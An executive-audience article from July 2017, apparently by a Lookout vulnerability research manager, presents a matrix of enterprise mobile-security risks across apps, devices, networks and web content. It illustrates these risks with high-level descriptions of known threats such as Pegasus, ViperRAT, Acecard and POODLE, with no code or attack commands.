| Executives July 13, 2017
July 13, 2017
Mobile devices are essential to today's enterprise IT environment, making employees more productive and able to quickly monitor and address work issues from anywhere in the world. It also greatly increases the potential attack surface that hackers can exploit, leading to data compromise.
For example, 47 in 1,000 Android devices in the enterprise have encountered app-based threats in the past six months, according to recent Lookout research, and 1 in 1,000 iOS devices encountered an app-based threat in the same time frame.
In other words, for every thousand Android and thousand iOS users your company has, you can expect multiple mobile threats every single year.
"It only takes one compromised mobile device to allow an attacker to set up a damaging connection to your intellectual property and sensitive personally identifiable information (PII)."
When attackers come after your employees' mobile devices, their first goal is access. The mobile device is a highly valuable touchpoint that attackers know can either a) give them the information they desire on first access or b) allow them to move through the enterprise to gain deeper access to data on the corporate network.
It only takes one compromised mobile device to allow an attacker to set up a damaging connection to your intellectual property and sensitive personally identifiable information (PII). However the mobile threats problem is more complicated than, for example, adware on the end-user device.
The Mobile Threat Matrix covers a series of components of risk and vectors through which data can be compromised on the mobile device. Threats make up one component and touch multiple vectors: apps, devices, networks, and web and content.
Sophisticated threats don't just exploit one vector; often they use multiple vectors to carry out their mission.
For instance, the Pegasus spyware that targets both iOS and Android devices uses SMS in a social-engineering phishing attack first. This is what we consider a web and content threat. Once targeted users received the phishing message, it required only a single tap on this message to silently root the device; install malicious software; and give attackers control over the phone's camera, microphone, and many more elements of the phone. This is where Pegasus touches the "device" threat vector. It could also track a victim's movements and steal end-to-end encrypted messages, because it had access to the unencrypted messages on the device.
Ultimately attackers are looking for any way into an enterprise's systems. They will regularly use multiple vectors in order to be as successful. If an enterprise does not account for all of the vectors when protecting against mobile threats, it leaves itself open to data compromise.
Here's a closer look at each of the vectors:
App-based threats are the most prevalent of the vectors. There are multiple headlines every month about a newly discovered piece of Android malware that has been installed on millions of devices.
Enterprises need to be immediately aware of any surveillance threats and other attempts to steal credentials. Apps like adware may not always stay adware. In fact, many app-based threats evolve into much more insidious attacks, such as ones that may root the phone to spy on targets, after waiting for some time on the device.
On average, Lookout has found that 3% of all app-based threat encounters found on enterprise devices each quarter are surveillanceware. For example, ViperRAT is a sophisticated and targeted threat that aims to exfiltrate camera images and uses a device's microphone to record audio. It targets the Israeli Defense Forces, but this kind of surveillanceware is surprisingly common.
One common example is "spouseware," in which individuals install malicious software on their partner's device. The target then brings his phone into work, accesses sensitive data, that the spouseware siphons off the phone. The larger problem is that criminals target spyware companies, such as the Flexispy hack, knowing that they do not store data securely. This means the sensitive enterprise data that was just stolen by a jealous boyfriend, was subsequently taken by a third-party that may actually see the value in that corporate data.
Other threats, such as Acecard, use an "overlay attack," in which the malicious app is able to strategically place a transparent window over other apps on the device to collect information the person inputs. Acecard targeted financial applications, siphoning off login credentials. This is also particularly concerning when considering single sign-on two-factor authentication apps. If an attacker uses an overlay attack on a single sign-on service or two-factor app, she instantly has nearly unrestricted access to corporate data.
"An attacker’s first goal is to get access. With one employee’s PII or credentials, an attacker is able to impersonate your employees, hijack accounts, and trick other employees into giving over sensitive corporate data."
Other malicious apps will use social engineering techniques to trick employees into "updating their app" by uninstalling the real one and installing a malicious one. The attacker then steals the login credentials to those services.
Why should a security leader pay attention to any of this? An attacker's first goal is to get access. With one employee's PII or credentials, an attacker is able to impersonate your employees, hijack accounts, and trick other employees into giving over sensitive corporate data. Because the mobile device is a wealth of this kind of PII and credentials, it's a prime target for criminals.
Device threats allow attackers to obtain unfettered access to the device and all its data by gaining higher levels of permission than are ordinarily granted to apps.
Autorooting malware is a threat that spans both app and device, for example LevelDropper. This is a malicious app that - immediately and silently - takes advantage of a software vulnerability in the device to gain OS-level control. Our research shows that on average, 10 out of 1,000 personal Android devices encounter an auto-rooting Trojan every year.
Once an attacker compromises a device, she can get access to any app or other piece of data, encrypted or not. For example, because Pegasus had device-level access, it was able to see all activity on the infected phone and siphon off large quantities of valuable and sensitive information knowing that apps would eventually have to decrypt that data in order to show it to the end-user.
Attackers who are able to compromise the device are also able to achieve much stealthier spying operations. Because malicious apps often do not have the same permissions as a device-level attack, they sometimes set off alerts on the phone when accessing the camera, microphone, or other elements. With a device compromise, an attacker can silently manipulate the smartphone without any indication to the user that something is wrong.
Network threats exploit weaknesses in how websites and applications establish TLS/SSL sessions over Wi-Fi, cellular, or other networks. TLS downgrade attacks, for example, are a big problem.
The POODLE OpenSSL vulnerability is a great example of exploiting weaknesses in how websites establish these connections. Attackers using the POODLE vulnerability could trick a mobile browser into believing that a connection to a higher version of encryption had failed. This would cause the mobile browser to downgrade the connection to SSL 3.0, an outdated and buggy version that could be compromised for data exfiltration.
"Web and content threats include phishing emails and text messages with links to malicious websites. This is one of the main vectors through which malicious software or other attacks happen on the device."
Web and content threats include phishing emails and text messages with links to malicious websites. This is one of the main vectors through which malicious software or other attacks happen on the device. The classic SMS phishing message or email through which someone is tricked into giving over sensitive data is a tactic that most security teams have seen in their tenure, though these tactics continue to work year after year.
Authentication tokens are also at risk. Some services still use SMS to send two-factor codes to end-users. Enterprise security teams should ensure that employees access two-factor codes through sanctioned apps and not over SMS. SMS is unencrypted and is a playground for eavesdroppers.
The Mobile Risk Matrix gives enterprises a good starting point to evaluate their mobile environment. Each organization should determine: Have we addressed all of the risks on the matrix? If so, how confident are we that the controls we have in place are effective?As mobile devices continue as a key part of the enterprise workflows, accessing sensitive corporate data on a daily basis from anywhere in the world, addressing mobile security is an ever-more urgent enterprise need. The sooner you protect these devices from the entire spectrum of mobile risk, the better. It only takes one weak point in the Spectrum of Mobile Risk to put your corporation at risk.
Andrew Blaich Manager - Vulnerability Research